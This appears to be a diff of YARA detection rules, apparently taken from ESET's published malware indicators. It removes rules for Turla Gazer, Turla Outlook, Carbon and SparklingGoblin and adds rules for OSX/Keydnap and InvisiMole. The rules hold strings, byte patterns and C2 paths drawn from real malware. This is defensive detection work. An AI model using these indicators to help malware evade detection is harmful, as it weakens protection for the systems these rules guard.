"be238f5c2cc976a5638584a8c0fc580f2076735aadfe374e8d4162ba723bce10" - score = 75 - quality = 80 - tags = "" - license = "BSD 2-Clause" - version = "1" - - strings: - $ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s" - - condition: - any of them -} -import "pe" - -rule ESET_Gazer_Certificate_Subject -{ - meta: - description = "Turla Gazer malware" - author = "ESET Research" - id = "a7719333-b341-538c-a8ed-5c50b653a765" - date = "2017-08-30" - modified = "2017-08-29" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/gazer.yar#L33-L46" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "6e870c9cdcee33769162de62ea143ff401af50b22a63d2f212c44d06f5771dec" - score = 75 - quality = 80 - tags = "" - contact = "github@eset.com" - license = "BSD 2-Clause" - - condition: - for any i in (0..pe.number_of_signatures-1) : (pe.signatures[i].subject contains "Solid Loop" or pe.signatures[i].subject contains "Ultimate Computer Support") -} -import "pe" - -rule ESET_Gazer_Certificate : FILE -{ - meta: - description = "Turla Gazer malware" - author = "ESET Research" - id = "e90bbe53-4e7f-59c4-a505-4893150bf824" - date = "2017-08-30" - modified = "2017-08-29" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/gazer.yar#L48-L65" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "eb3afbaefd23d4fc6ded494d3378dc910a0832b160e733ab79c590128dd74cea" - score = 75 - quality = 80 - tags = "FILE" - contact = "github@eset.com" - license = "BSD 2-Clause" - - strings: - $certif1 = {52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02} - $certif2 = {12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c} - - condition: - ( uint16(0)==0x5a4d) and 1 of them and filesize <2MB -} -import "pe" - -rule ESET_Gazer_Logfile_Name : FILE -{ - meta: - description = "Turla Gazer malware" - author = "ESET Research" - id = "3e1454e9-dddf-5197-b486-b96d725fdb58" - date = "2017-08-30" - modified = "2017-08-29" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/gazer.yar#L67-L85" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "b50553f4b4b07f124e5bd390e7dc8ac6b60a8ef185f3bc227894f957d6483478" - score = 75 - quality = 80 - tags = "FILE" - contact = "github@eset.com" - license = "BSD 2-Clause" - - strings: - $s1 = "CVRG72B5.tmp.cvr" - $s2 = "CVRG1A6B.tmp.cvr" - $s3 = "CVRG38D9.tmp.cvr" - - condition: - ( uint16(0)==0x5a4d) and 1 of them -} -import "pe" - -rule ESET_Turla_Outlook_Gen -{ - meta: - description = "Turla Outlook malware" - author = "ESET Research" - id = "efef2443-c941-54c2-abfa-bbe29c53d930" - date = "2018-05-09" - modified = "2018-09-05" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/turla-outlook.yar#L42-L74" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "f709e517e9d957775601670c426cc9def1c4104cb1ff647d269800d2af4372c7" + id = "2b21007a-b143-5538-8777-ba35448d00aa" + date = "2016-07-06" + modified = "2016-07-06" + reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/keydnap/keydnap.yar#L33-L49" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "71c8885193a92fa9c71055c37e629a54d50070cf6820b9216a824ecc4db2ce3c" score = 75 - quality = 78 + quality = 80 tags = "" - version = 2 - contact = "github@eset.com" - license = "BSD 2-Clause" + version = "1" strings: - $s1 = "Outlook Express" ascii wide - $s2 = "Outlook watchdog" ascii wide - $s3 = "Software\\RIT\\The Bat!" ascii wide - $s4 = "Mail Event Window" ascii wide - $s5 = "Software\\Mozilla\\Mozilla Thunderbird\\Profiles" ascii wide - $s6 = "%%PDF-1.4\n%%%c%c\n" ascii wide - $s7 = "%Y-%m-%dT%H:%M:%S+0000" ascii wide - $s8 = "rctrl_renwnd32" ascii wide - $s9 = "NetUIHWND" ascii wide - $s10 = "homePostalAddress" ascii wide - $s11 = "/EXPORT;OVERRIDE;START=-%d;END=-%d;FOLDER=%s;OUT=" ascii wide - $s12 = "Re:|FWD:|AW:|FYI:|NT|QUE:" ascii wide - $s13 = "IPM.Note" ascii wide - $s14 = "MAPILogonEx" ascii wide - $s15 = "pipe\\The Bat! %d CmdLine" ascii wide - $s16 = "PowerShellRunner.dll" ascii wide - $s17 = "cmd container" ascii wide - $s18 = "mapid.tlb" ascii wide nocase - $s19 = "Content-Type: F)*+" ascii wide fullword + $ = "icloudsyncd" + $ = "killall Terminal" + $ = "open %s" condition: - ESET_Not_Ms_PRIVATE and 5 of them + 2 of them } -import "pe" - -rule ESET_Turla_Outlook_Filenames +rule ESET_Keydnap_Backdoor_Packer { meta: - description = "Turla Outlook filenames" - author = "ESET Research" - id = "3a08003d-50d6-5fdf-9f74-222335ebfa3e" - date = "2018-08-22" - modified = "2018-09-05" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/turla-outlook.yar#L76-L91" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "3be86c9325de6634c032321beed131fdf1e1952afcb43258fb202d0097610501" + description = "OSX/Keydnap packed backdoor" + author = "Marc-Etienne M.Léveillé" + id = "f29ad5af-bc86-5764-9451-5a8363788c4e" + date = "2016-07-06" + modified = "2016-07-06" + reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/keydnap/keydnap.yar#L51-L67" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "b1740bf38376be81d3b42306c2ce81f578c0b5c9db804f063836bf98f57ed147" score = 75 quality = 80 tags = "" - contact = "github@eset.com" - license = "BSD 2-Clause" + version = "1" strings: - $s1 = "mapid.tlb" - $s2 = "msmime.dll" - $s3 = "scawrdot.db" + $upx_string = "This file is packed with the UPX" + $packer_magic = "ASS7" + $upx_magic = "UPX!" condition: - any of them + $upx_string and $packer_magic and not $upx_magic } -import "pe" - -rule ESET_Turla_Outlook_Log +rule ESET_Keydnap_Backdoor { meta: - description = "First bytes of the encrypted Turla Outlook logs" - author = "ESET Research" - id = "b0031c08-8418-5a02-8a2c-daa7236f46f0" - date = "2018-08-22" - modified = "2018-09-05" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/turla-outlook.yar#L93-L107" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "e7dc00c33a643c0940aaea2096d099192b27df3c81c518f1dc2b3d45a0a74312" + description = "Unpacked OSX/Keydnap backdoor" + author = "Marc-Etienne M.Léveillé" + id = "099c1796-6237-5ec1-ba25-cd5feca79865" + date = "2016-07-06" + modified = "2016-07-06" + reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/keydnap/keydnap.yar#L69-L86" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "fa209577a562ef9088d3ad3df3fbc0edda96f09d19177842f0ddea42c658f530" score = 75 quality = 80 tags = "" - contact = "github@eset.com" - license = "BSD 2-Clause" + version = "1" strings: - $s1 = {01 87 C9 75 C8 69 98 AC E0 C9 7B [21] EB BB 60 BB 5A} + $ = "api/osx/get_task" + $ = "api/osx/cmd_executed" + $ = "Loader-" + $ = "u2RLhh+!LGd9p8!ZtuKcN" + $ = "com.apple.iCloud.sync.daemon" condition: - $s1 at 0 + 2 of them } import "pe" -rule ESET_Turla_Outlook_Exports +rule ESET_Apt_Windows_Invisimole_Logs : FILE { meta: - description = "Export names of Turla Outlook Malware" + description = "Detects log files with collected created by InvisiMole's RC2CL backdoor" author = "ESET Research" - id = "6df4f75e-711a-539d-94bf-9e4e2063ecd4" - date = "2018-08-22" - modified = "2018-09-05" + id = "151883ad-1f44-55b4-b12a-f0d399527189" + date = "2021-05-17" + modified = "2021-05-17" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/turla-outlook.yar#L109-L125" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "a961fdb43ea1e99b308f55b8f5e264b1f3fa817eaf463d512e2ad8b98a18ee99" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L54-L77" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "d42423ccc768f1823c76d5cb2aec26434c796fc35bd4e2fbf435fcf7997d3ff0" score = 75 quality = 80 - tags = "" - contact = "github@eset.com" + tags = "FILE" license = "BSD 2-Clause" + version = "1" condition: - (pe.exports("install") or pe.exports("Install")) and pe.exports("TBP_Initialize") and pe.exports("TBP_Finalize") and pe.exports("TBP_GetName") and pe.exports("DllRegisterServer") and pe.exports("DllGetClassObject") + uint32(0)==0x08F1CAA1 or uint32(0)==0x08F1CAA2 or uint32(0)==0x08F1CCC0 or uint32(0)==0x08F2AFC0 or uint32(0)==0x083AE4DF or uint32(0)==0x18F2CBB1 or uint32(0)==0x1900ABBA or uint32(0)==0x24F2CEA1 or uint32(0)==0xDA012193 or uint32(0)==0xDA018993 or uint32(0)==0xDA018995 or uint32(0)==0xDD018991 } import "pe" -rule ESET_Generic_Carbon : FILE +rule ESET_Apt_Windows_Invisimole_SFX_Dropper : FILE { meta: - description = "Turla Carbon malware" + description = "Detects trojanized InvisiMole files: patched RAR SFX droppers with added InvisiMole blobs (config encrypted XOR 2A at the end of a file)" author = "ESET Research" - id = "efdc0d16-a974-5c00-a401-391d60f3081e" - date = "2017-03-30" - modified = "2017-03-30" + id = "08490bcd-3139-5fac-9c6c-5a32acb7217a" + date = "2021-05-17" + modified = "2021-05-17" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/carbon.yar#L33-L51" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "6481ccafb7c7c78bc52d01881cb96f3aa6209fdd35e090bdc9d5f5105b4e38ea" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L79-L95" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "6ca248d42c1e889988e5931d80df071cb20e623fb0c4a208044cabe073f71ce4" score = 75 quality = 80 tags = "FILE" - contact = "github@eset.com" license = "BSD 2-Clause" + version = "1" strings: - $s1 = "ModStart" - $t1 = "STOP|OK" - $t2 = "STOP|KILL" + $encrypted_config = {5F 59 4F 58 19 18 04 4E 46 46 2A 5D 59 5A 58 43 44 5E 4C 7D 2A 0F 2A 59 2A 78 2A 4B 2A 58 2A 0E 2A 6F 2A 72 2A 4B 2A 0F 2A 4E 2A 04 2A 0F 2A 4E 2A 76 2A 0F 2A 79 2A 2A 2A 79 42 4F 46 46 6F 52 4F 49 5F 5E 4F 7D 2A 79 42 4F 46 46 19 18 04 4E 46 46 2A 7C 43 58 5E 5F 4B 46 6B 46 46 45 49 2A 66 45 4B 4E 66 43 48 58 4B 58 53 6B} condition: - ( uint16(0)==0x5a4d) and (1 of ($s*)) and (1 of ($t*)) + uint16(0)==0x5A4D and $encrypted_config } import "pe" -rule ESET_Carbon_Metadata +rule ESET_Apt_Windows_Invisimole_CPL_Loader : FILE { meta: - description = "Turla Carbon malware" + description = "CPL loader" author = "ESET Research" - id = "976b6a7d-00bf-5d0f-baf9-84fc5dbd21a2" - date = "2017-03-30" - modified = "2017-03-30" + id = "feff8627-6085-5835-ac1b-d4522245f7db" + date = "2021-05-17" + modified = "2021-05-17" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/carbon.yar#L53-L69" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "81b59e9566f3b3356acf12dadb80abdcbee28e0b1a9efead66fcb95bf6fc1aa5" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L97-L118" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "cd5c19e14faa7fd3758b30193ccf2bed3692ad29d8216466523ca25d2abcfe88" score = 75 quality = 80 - tags = "" - contact = "github@eset.com" + tags = "FILE" license = "BSD 2-Clause" + version = "1" + + strings: + $s1 = "WScr%steObject(\"WScr%s.Run(\"::{20d04fe0-3a%s30309d}\\\\::{21EC%sDD-08002B3030%s\", 0);" + $s2 = "\\Control.js" wide + $s3 = "\\Control Panel.lnk" wide + $s4 = "FPC 3.0.4 [2019/04/13] for x86_64 - Win64" + $s5 = "FPC 3.0.4 [2019/04/13] for i386 - Win32" + $s6 = "imageapplet.dat" wide + $s7 = "wkssvmtx" condition: - (pe.version_info["InternalName"] contains "SERVICE.EXE" or pe.version_info["InternalName"] contains "MSIMGHLP.DLL" or pe.version_info["InternalName"] contains "MSXIML.DLL") and pe.version_info["CompanyName"] contains "Microsoft Corporation" + uint16(0)==0x5A4D and (3 of them ) } import "pe" -rule ESET_Sparklinggoblin_Chacha20Loader_Richheader +rule ESET_Apt_Windows_Invisimole_Wrapper_DLL { meta: - description = "Rule matching ChaCha20 loaders rich header" + description = "Detects InvisiMole wrapper DLL with embedded RC2CL and RC2FM backdoors, by export and resource names" author = "ESET Research" - id = "e1dac369-f25e-5cb3-aafa-b0c45f05b295" - date = "2021-03-30" - modified = "2021-08-26" + id = "b9609b09-3ef5-5793-a3aa-4692cec367d9" + date = "2021-05-17" + modified = "2021-05-17" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/sparklinggoblin/SparklingGoblin.yar#L33-L57" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "09ffe37a54bc4ebebd8d56098e4c76232f35d821" - hash = "29b147b76bb0d9e09f7297487cb972e6a2905586" - hash = "33f2c3de2457b758fc5824a2b253ad7c7c2e9e37" - hash = "45bef297ce78521eac6ee39e7603e18360e67c5a" - hash = "4cec7cdc78d95c70555a153963064f216dae8799" - hash = "4d4c1a062a0390b20732ba4d65317827f2339b80" - hash = "4f6949a4906b834e83ff951e135e0850fe49d5e4" - logic_hash = "a5c9595036dec0e0aef0a030c590189752217d15d3f53bf3dc537f5b43fae63e" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L120-L138" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "156bc5bc7b0ed5c77a5a15e7799a3077d40150896476a60935cf21a9afe36856" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" + version = "1" condition: - pe.rich_signature.length>=104 and pe.rich_signature.length<=112 and pe.rich_signature.toolid(241,40116)>=5 and pe.rich_signature.toolid(241,40116)<=10 and pe.rich_signature.toolid(147,30729)==11 and pe.rich_signature.toolid(264,24215)>=15 and pe.rich_signature.toolid(264,24215)<=16 + pe.exports("GetDataLength") and for any y in (0..pe.number_of_resources-1) : (pe.resources[y].type==pe.RESOURCE_TYPE_RCDATA and pe.resources[y].name_string=="R\x00C\x002\x00C\x00L\x00") and for any y in (0..pe.number_of_resources-1) : (pe.resources[y].type==pe.RESOURCE_TYPE_RCDATA and pe.resources[y].name_string=="R\x00C\x002\x00F\x00M\x00") } import "pe" -rule ESET_Sparklinggoblin_Chacha20 : FILE +rule ESET_Apt_Windows_Invisimole_DNS_Downloader : FILE { meta: - description = "SparklingGoblin ChaCha20 implementations" + description = "InvisiMole DNS downloader" author = "ESET Research" - id = "c0caceca-f685-5786-82f6-3ab7435f8061" - date = "2021-05-20" - modified = "2021-08-26" + id = "1caa6c8b-3798-556e-835e-885b7f3f4511" + date = "2021-05-17" + modified = "2021-05-17" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/sparklinggoblin/SparklingGoblin.yar#L59-L368" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b" - hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f" - hash = "8be6d5f040d0085c62b1459afc627707b0de89cf" - hash = "4668302969fe122874fb2447a80378dcb671c86b" - hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b" - hash = "9ce7650f2c08c391a35d69956e171932d116b8bd" - hash = "91b32e030a1f286e7d502ca17e107d4bfbd7394a" - logic_hash = "b742bc22e0ebbce40607cb109b4d6fb03a40c1fb223c8092d93346dd3dd22789" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L140-L170" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "88d6ed7ec1331153d19afc18473a4be2b214ad8af29fcf7051a2a8e40e088231" score = 75 quality = 80 tags = "FILE" license = "BSD 2-Clause" + version = "1" strings: - $chunk_1 = { - 8B 4D ?? - 56 - 8B 75 ?? - 57 - 8B 7D ?? - 8B 04 BB - 01 04 93 - 8B 04 B3 - 33 04 93 - C1 C0 10 - 89 04 B3 - 01 04 8B - 8B 04 BB - 33 04 8B - C1 C0 0C - 89 04 BB - 01 04 93 - 8B 04 B3 - 33 04 93 - C1 C0 08 - 89 04 B3 - 01 04 8B - 8B 04 BB - 33 04 8B - C1 C0 07 - 89 04 BB - } - $chunk_2 = { - 03 4D ?? - 44 03 C0 - 03 55 ?? - 33 F1 - 45 33 D8 - C1 C6 10 - 44 33 F2 - 41 C1 C3 10 - 41 03 FB - 41 C1 C6 10 - 45 03 E6 - 41 03 DA - 44 33 CB - 44 03 EE - 41 C1 C1 10 - 8B C7 - 33 45 ?? - 45 03 F9 - C1 C0 0C - 44 03 C0 - 45 33 D8 - 44 89 45 ?? - 41 C1 C3 08 - 41 03 FB - 44 8B C7 - 44 33 C0 - 41 8B C5 - 33 45 ?? - C1 C0 0C - 03 C8 - 41 C1 C0 07 - 33 F1 - 89 4D ?? - C1 C6 08 - 44 03 EE - 41 8B CD - 33 C8 - 41 8B C4 - 33 45 ?? - C1 C0 0C - 03 D0 - C1 C1 07 - 44 33 F2 - 89 55 ?? - 41 C1 C6 08 - 45 03 E6 - 41 8B D4 - 33 D0 - 41 8B C7 - 41 33 C2 - C1 C2 07 - C1 C0 0C - 03 D8 - 44 33 CB - 41 C1 C1 08 - 45 03 F9 - 45 8B D7 - 44 33 D0 - 8B 45 ?? - 03 C1 - 41 C1 C2 07 - 44 33 C8 - 89 45 ?? - 41 C1 C1 10 - 45 03 E1 - 41 8B C4 - 33 C1 - 8B 4D ?? - C1 C0 0C - 03 C8 - 44 33 C9 - 89 4D ?? - 89 4D ?? - 41 C1 C1 08 - 45 03 E1 - 41 8B CC - 33 C8 - 8B 45 ?? - C1 C1 07 - 89 4D ?? - 89 4D ?? - 03 C2 - 41 03 D8 - 89 45 ?? - 41 33 C3 - C1 C0 10 - 44 03 F8 - 41 8B CF - 33 CA - 8B 55 ?? - } - $chunk_3 = { - C7 45 ?? 65 78 70 61 - 4C 8D 45 ?? - C7 45 ?? 6E 64 20 33 - 4D 8B F9 - C7 45 ?? 32 2D 62 79 - 4C 2B C1 - C7 45 ?? 74 65 20 6B - } - $chunk_4 = { - 0F B6 02 - 0F B6 4A ?? - C1 E1 08 - 0B C8 - 0F B6 42 ?? - C1 E1 08 - 0B C8 - 0F B6 42 ?? - C1 E1 08 - 0B C8 - 41 89 0C 10 - 48 8D 52 ?? - 49 83 E9 01 - } - $chunk_5 = { - 03 4D ?? - 44 03 C0 - 03 55 ?? - 33 F1 - 41 33 F8 - C1 C6 10 - 44 33 F2 - C1 C7 10 - 44 03 DF - 41 C1 C6 10 - 45 03 E6 - 44 03 CB - 45 33 D1 - 44 03 EE - 41 C1 C2 10 - 41 8B C3 - 33 45 ?? - 45 03 FA - C1 C0 0C - 44 03 C0 - 41 33 F8 - 44 89 45 ?? - C1 C7 08 - 44 03 DF - 45 8B C3 - 44 33 C0 - 41 8B C5 - 33 45 ?? - C1 C0 0C - 03 C8 - 41 C1 C0 07 - 33 F1 - 89 4D ?? - C1 C6 08 - 44 03 EE - 41 8B CD - 33 C8 - 41 8B C4 - 33 45 ?? - C1 C0 0C - 03 D0 - C1 C1 07 - 44 33 F2 - 89 55 ?? - 41 C1 C6 08 - 45 03 E6 - 41 8B D4 - 33 D0 - 41 8B C7 - 33 C3 - C1 C2 07 - C1 C0 0C - 44 03 C8 - 45 33 D1 - 41 C1 C2 08 - 45 03 FA - 41 8B DF - 33 D8 - 8B 45 ?? - 03 C1 - C1 C3 07 - 44 33 D0 - 89 45 ?? - 41 C1 C2 10 - 45 03 E2 - 41 8B C4 - 33 C1 - 8B 4D ?? - C1 C0 0C - 03 C8 - 44 33 D1 - 89 4D ?? - 89 4D ?? - 41 C1 C2 08 - 45 03 E2 - 41 8B CC - 33 C8 - 8B 45 ?? - C1 C1 07 - 89 4D ?? - 89 4D ?? - 03 C2 - 45 03 C8 - 89 45 ?? - 33 C7 - C1 C0 10 - 44 03 F8 - 41 8B CF - 33 CA - 8B 55 ?? - C1 C1 0C - 03 D1 - 8B FA - 89 55 ?? - 33 F8 - 89 55 ?? - 8B 55 ?? - 03 D3 - C1 C7 08 - 44 03 FF - 41 8B C7 - 33 C1 - C1 C0 07 - 89 45 ?? - 89 45 ?? - 8B C2 - 33 C6 - C1 C0 10 - 44 03 D8 - 41 33 DB - C1 C3 0C - 03 D3 - 8B F2 - 89 55 ?? - 33 F0 - 41 8B C1 - 41 33 C6 - C1 C6 08 - C1 C0 10 - 44 03 DE - 44 03 E8 - 41 33 DB - 41 8B CD - C1 C3 07 - 41 33 C8 - 44 8B 45 ?? - C1 C1 0C - 44 03 C9 - 45 8B F1 - 44 33 F0 - 41 C1 C6 08 - 45 03 EE - 41 8B C5 - 33 C1 - 8B 4D ?? - C1 C0 07 - } + $d = "DnsQuery_A" + $s1 = "Wireshark-is-running-{9CA78EEA-EA4D-4490-9240-FC01FCEF464B}" xor + $s2 = "AddIns\\" ascii wide xor + $s3 = "pcornomeex." xor + $s4 = "weriahsek.rxe" xor + $s5 = "dpmupaceex." xor + $s6 = "TCPViewClass" xor + $s7 = "PROCMON_WINDOW_CLASS" xor + $s8 = "Key%C" + $s9 = "AutoEx%C" xor + $s10 = "MSO~" + $s11 = "MDE~" + $s12 = "DNS PLUGIN, Step %d" xor + $s13 = "rundll32.exe \"%s\",StartUI" condition: - any of them and filesize <450KB + (( uint16(0)==0x5A4D) or ESET_Invisimole_Blob_PRIVATE) and $d and 5 of ($s*) } import "pe" -rule ESET_Sparklinggoblin_Etweventwrite +rule ESET_Apt_Windows_Invisimole_RC2CL_Backdoor : FILE { meta: - description = "SparklingGoblin EtwEventWrite patching" + description = "InvisiMole RC2CL backdoor" author = "ESET Research" - id = "27b36ee1-a98c-5174-a156-8e0b0d0a58cd" - date = "2021-05-20" - modified = "2021-08-26" + id = "0228b8ee-bf03-504e-8cdf-8a1c9a79d54e" + date = "2021-05-17" + modified = "2021-05-17" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/sparklinggoblin/SparklingGoblin.yar#L370-L463" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b" - hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f" - hash = "8be6d5f040d0085c62b1459afc627707b0de89cf" - hash = "4668302969fe122874fb2447a80378dcb671c86b" - hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b" - hash = "9ce7650f2c08c391a35d69956e171932d116b8bd" - logic_hash = "45615dcc5302392c18052818071623a9d1a1008c460bdb24a4acfb4300356c6b" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L172-L213" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "c38550023515d33eaaf0669cc8b874bcfd09653a07c7edbf72e3344d1cf31541" score = 75 - quality = 80 - tags = "" + quality = 78 + tags = "FILE" license = "BSD 2-Clause" + version = "1" strings: - $chunk_1 = { - 48 8D 0D ?? ?? ?? ?? - C7 44 24 ?? 48 31 C0 C3 - FF 15 ?? ?? ?? ?? - 48 8B C8 - 48 8D 15 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? - 83 64 24 ?? 00 - 4C 8D 4C 24 ?? - BF 04 00 00 00 - 48 8B C8 - 8B D7 - 48 8B D8 - 44 8D 47 ?? - FF 15 ?? ?? ?? ?? - 44 8B C7 - 48 8D 54 24 ?? - 48 8B CB - E8 ?? ?? ?? ?? - 44 8B 44 24 ?? - 4C 8D 4C 24 ?? - 8B D7 - 48 8B CB - FF 15 ?? ?? ?? ?? - 48 8B 05 ?? ?? ?? ?? - } - $chunk_2 = { - 55 - 8B EC - 51 - 51 - 57 - 68 08 1A 41 00 - 66 C7 45 ?? C2 14 - C6 45 ?? 00 - FF 15 ?? ?? ?? ?? - 68 10 1A 41 00 - 50 - FF 15 ?? ?? ?? ?? - 83 65 ?? 00 - 8B F8 - 8D 45 ?? - 50 - 6A 40 - 6A 03 - 57 - FF 15 ?? ?? ?? ?? - 6A 03 - 8D 45 ?? - 50 - 57 - E8 ?? ?? ?? ?? - 83 C4 0C - 8D 45 ?? - 50 - FF 75 ?? - 6A 03 - 57 - FF 15 ?? ?? ?? ?? - } - $chunk_3 = { - 48 8D 0D ?? ?? ?? ?? - C7 44 24 ?? 48 31 C0 C3 - FF 15 ?? ?? ?? ?? - 48 8B C8 - 48 8D 15 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? - } + $s1 = "RC2CL" wide + $s2 = "hp12KsNh92Dwd" wide + $s3 = "ZLib package %s: files: %d, total size: %d" wide + $s4 = "\\Un4seen" wide + $s5 = {9E 01 3A AD} + $s6 = "~mrc_" wide + $s7 = "~src_" wide + $s8 = "~wbc_" wide + $s9 = "zdf_" wide + $s10 = "~S0PM" wide + $s11 = "~A0FM" wide + $s12 = "~70Z63\\" wide + $s13 = "~E070C" wide + $s14 = "~N031E" wide + $s15 = "%szdf_%s.data" wide + $s16 = "%spicture.crd" wide + $s17 = "%s70zf_%s.cab" wide + $s18 = "%spreview.crd" wide + $s19 = "Value_Bck" wide + $s20 = "Value_WSFX_ZC" wide + $s21 = "MachineAccessStateData" wide + $s22 = "SettingsSR2" wide condition: - any of them + (( uint16(0)==0x5A4D) or ESET_Invisimole_Blob_PRIVATE) and 5 of ($s*) } import "pe" -rule ESET_Sparklinggoblin_Mutex +rule ESET_Apt_Windows_Invisimole : FILE { meta: - description = "SparklingGoblin ChaCha20 loaders mutexes" + description = "InvisiMole magic values, keys and strings" author = "ESET Research" - id = "e33d2bc1-29d6-5117-8e0f-31f8bced0979" - date = "2021-05-20" - modified = "2021-08-26" + id = "4d48996b-9792-57ba-a302-349220323712" + date = "2021-05-17" + modified = "2021-05-17" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/sparklinggoblin/SparklingGoblin.yar#L465-L489" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b" - hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f" - hash = "8be6d5f040d0085c62b1459afc627707b0de89cf" - hash = "4668302969fe122874fb2447a80378dcb671c86b" - hash = 